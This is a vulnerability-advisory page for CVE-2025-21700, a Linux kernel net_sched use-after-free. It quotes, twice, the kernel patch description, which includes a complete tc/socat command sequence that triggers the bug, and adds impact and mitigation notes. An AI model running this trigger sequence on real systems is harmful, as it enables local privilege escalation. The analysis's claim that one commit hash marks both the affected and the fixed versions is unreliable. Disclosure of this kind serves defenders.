CVE-2025-21700: Vulnerability in Linux Linux
In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle 1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug <=== prevented by this patch tc qdisc replace dev lo parent 1:3 handle 4:0 step 11. Redisplay again the qdiscs/classes tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent 1:2 Observe that a) parent for 4:0 does not change despite the replace request. There can only be one parent. b) refcount has gone up by two for 4:0 and c) both class 1:3 and 3:1 are pointing to it. Step 12. send one packet to plug echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001)) step13. send one packet to the grafted fifo echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003)) step14. lets trigger the uaf tc class delete dev lo classid 1:3 tc class delete dev lo classid 1:1 The semantics of "replace" is for a del/add _on the same node_ and not a delete from one node(3:1) and add to another node (1:3) as in step10. While we could "fix" with a more complex approach there could be consequences to expectations so the patch takes the preventive approach of "disallow such config". Joint work with Lion Ackermann <nnamrec@gmail.com>
AI Analysis
Technical Summary
CVE-2025-21700 is a high-severity use-after-free (UAF) vulnerability in the Linux kernel's network scheduler (net_sched) subsystem, specifically related to the handling of queuing disciplines (qdiscs) and classes. The vulnerability arises from improper handling of the 'replace' operation on child qdiscs, where the kernel incorrectly allows replacing a child qdisc from one parent class to another. This misuse leads to a state where multiple classes reference the same qdisc object, causing a use-after-free condition when one of the classes is deleted. The vulnerability was discovered and demonstrated by Lion Ackermann through a sequence of tc (traffic control) commands that create a root qdisc, add classes and nested qdiscs, and then attempt to replace a qdisc's parent improperly. The kernel's semantics expect 'replace' to operate only on the same node, but the exploit attempts to move a qdisc from one parent to another, which is disallowed by the patch. Exploiting this flaw can lead to privilege escalation, as the UAF can be abused to execute arbitrary code with elevated privileges. The vulnerability affects Linux kernel versions identified by the commit hash 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and was patched by disallowing such configurations rather than implementing a complex fix, to avoid breaking expected behavior. The CVSS v3.1 score is 7.8 (high), with attack vector local, low attack complexity, low privileges required, no user interaction, and impacts on confidentiality, integrity, and availability. No known exploits are reported in the wild yet.
Potential Impact
For European organizations, this vulnerability poses a significant risk, especially for those running Linux-based infrastructure, including servers, network appliances, and embedded devices. The ability to escalate privileges locally can allow attackers who have limited access (e.g., via compromised user accounts or containers) to gain root access, potentially leading to full system compromise. This can affect critical services, data confidentiality, and system availability. Organizations relying on Linux for network functions, cloud infrastructure, or edge computing are particularly vulnerable. The exploitation does not require user interaction but does require local access, which means insider threats or attackers who have gained initial footholds can leverage this flaw. The vulnerability could also be chained with other exploits to achieve remote code execution. Given the widespread use of Linux in Europe’s public and private sectors, including government, finance, telecommunications, and manufacturing, the impact could be broad and severe if unpatched.
Mitigation Recommendations
1. Immediate application of the official Linux kernel patch that disallows replacing child qdiscs from one parent to another is critical. 2. Update all affected Linux systems to the latest kernel versions containing the fix identified by the commit hash 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 or later. 3. Restrict local access to trusted users only, employing strict access controls and monitoring to detect suspicious use of tc commands or network scheduler manipulations. 4. Employ kernel hardening techniques such as SELinux or AppArmor to limit the impact of privilege escalation attempts. 5. Monitor system logs for unusual tc command usage or network scheduler configuration changes. 6. For containerized environments, ensure containers run with minimal privileges and consider using seccomp filters to restrict access to network configuration syscalls. 7. Conduct regular vulnerability scanning and penetration testing focused on local privilege escalation vectors. 8. Educate system administrators about this vulnerability and the importance of timely patching and access control.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden, Finland, Belgium
CVE-2025-21700: Vulnerability in Linux Linux
Description
In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle 1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug <=== prevented by this patch tc qdisc replace dev lo parent 1:3 handle 4:0 step 11. Redisplay again the qdiscs/classes tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent 1:2 Observe that a) parent for 4:0 does not change despite the replace request. There can only be one parent. b) refcount has gone up by two for 4:0 and c) both class 1:3 and 3:1 are pointing to it. Step 12. send one packet to plug echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001)) step13. send one packet to the grafted fifo echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003)) step14. lets trigger the uaf tc class delete dev lo classid 1:3 tc class delete dev lo classid 1:1 The semantics of "replace" is for a del/add _on the same node_ and not a delete from one node(3:1) and add to another node (1:3) as in step10. While we could "fix" with a more complex approach there could be consequences to expectations so the patch takes the preventive approach of "disallow such config". Joint work with Lion Ackermann <nnamrec@gmail.com>
AI-Powered Analysis
Technical Analysis
CVE-2025-21700 is a high-severity use-after-free (UAF) vulnerability in the Linux kernel's network scheduler (net_sched) subsystem, specifically related to the handling of queuing disciplines (qdiscs) and classes. The vulnerability arises from improper handling of the 'replace' operation on child qdiscs, where the kernel incorrectly allows replacing a child qdisc from one parent class to another. This misuse leads to a state where multiple classes reference the same qdisc object, causing a use-after-free condition when one of the classes is deleted. The vulnerability was discovered and demonstrated by Lion Ackermann through a sequence of tc (traffic control) commands that create a root qdisc, add classes and nested qdiscs, and then attempt to replace a qdisc's parent improperly. The kernel's semantics expect 'replace' to operate only on the same node, but the exploit attempts to move a qdisc from one parent to another, which is disallowed by the patch. Exploiting this flaw can lead to privilege escalation, as the UAF can be abused to execute arbitrary code with elevated privileges. The vulnerability affects Linux kernel versions identified by the commit hash 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and was patched by disallowing such configurations rather than implementing a complex fix, to avoid breaking expected behavior. The CVSS v3.1 score is 7.8 (high), with attack vector local, low attack complexity, low privileges required, no user interaction, and impacts on confidentiality, integrity, and availability. No known exploits are reported in the wild yet.
Potential Impact
For European organizations, this vulnerability poses a significant risk, especially for those running Linux-based infrastructure, including servers, network appliances, and embedded devices. The ability to escalate privileges locally can allow attackers who have limited access (e.g., via compromised user accounts or containers) to gain root access, potentially leading to full system compromise. This can affect critical services, data confidentiality, and system availability. Organizations relying on Linux for network functions, cloud infrastructure, or edge computing are particularly vulnerable. The exploitation does not require user interaction but does require local access, which means insider threats or attackers who have gained initial footholds can leverage this flaw. The vulnerability could also be chained with other exploits to achieve remote code execution. Given the widespread use of Linux in Europe’s public and private sectors, including government, finance, telecommunications, and manufacturing, the impact could be broad and severe if unpatched.
Mitigation Recommendations
1. Immediate application of the official Linux kernel patch that disallows replacing child qdiscs from one parent to another is critical. 2. Update all affected Linux systems to the latest kernel versions containing the fix identified by the commit hash 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 or later. 3. Restrict local access to trusted users only, employing strict access controls and monitoring to detect suspicious use of tc commands or network scheduler manipulations. 4. Employ kernel hardening techniques such as SELinux or AppArmor to limit the impact of privilege escalation attempts. 5. Monitor system logs for unusual tc command usage or network scheduler configuration changes. 6. For containerized environments, ensure containers run with minimal privileges and consider using seccomp filters to restrict access to network configuration syscalls. 7. Conduct regular vulnerability scanning and penetration testing focused on local privilege escalation vectors. 8. Educate system administrators about this vulnerability and the importance of timely patching and access control.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- Linux
- Date Reserved
- 2024-12-29T08:45:45.748Z
- Cisa Enriched
- true
- Cvss Version
- 3.1
- State
- PUBLISHED
Threat ID: 682d9834c4522896dcbe985e
Added to database: 5/21/2025, 9:09:08 AM
Last enriched: 7/3/2025, 5:41:41 AM
Last updated: 7/25/2025, 12:17:20 PM
Views: 8
Related Threats
CVE-2025-8842: Use After Free in NASM Netwide Assember
MediumResearchers Detail Windows EPM Poisoning Exploit Chain Leading to Domain Privilege Escalation
HighCVE-2025-8841: Unrestricted Upload in zlt2000 microservices-platform
MediumCVE-2025-8840: Improper Authorization in jshERP
MediumCVE-2025-8853: CWE-290 Authentication Bypass by Spoofing in 2100 Technology Official Document Management System
CriticalActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.